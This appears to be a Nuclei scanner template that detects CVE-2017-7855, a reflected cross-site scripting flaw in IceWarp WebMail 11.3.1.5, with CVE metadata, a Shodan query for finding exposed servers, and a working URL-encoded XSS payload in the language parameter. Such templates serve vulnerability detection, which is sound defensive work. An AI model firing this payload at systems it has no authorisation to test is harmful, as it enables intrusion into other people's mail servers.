id: CVE-2017-7855 info: name: IceWarp WebMail 11.3.1.5 - Cross-Site Scripting author: r3Y3r53 severity: medium description: | IceWarp WebMail 11.3.1.5 is vulnerable to cross-site scripting via the language parameter. remediation: Apply the latest security patch or upgrade to a non-vulnerable version of IceWarp WebMail. reference: - https://technical.nttsecurity.com/post/102eegq/cookies-are-delicious - https://nvd.nist.gov/vuln/detail/CVE-2017-7855 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-7855 cwe-id: CWE-79 epss-score: 0.0009 epss-percentile: 0.37631 cpe: cpe:2.3:a:icewarp:server:11.3.1.5:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: icewarp product: server shodan-query: title:"icewarp" tags: cve,cve2017,xss,icewarp http: - method: GET path: - "{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E" matchers-condition: and matchers: - type: word part: body words: - 'lang="">' - 'IceWarp' condition: and case-insensitive: true - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 4b0a00483046022100af1698012d89906a13f4e5f6cf4f61e907d4b64a6957aea77d5dd6d3f4ee6056022100b0ee8fb7411befbf7e4f701a3ea21a18dd6d8cc9d948e4e493608f308b588619:922c64590222798bb761d5b6d8e72950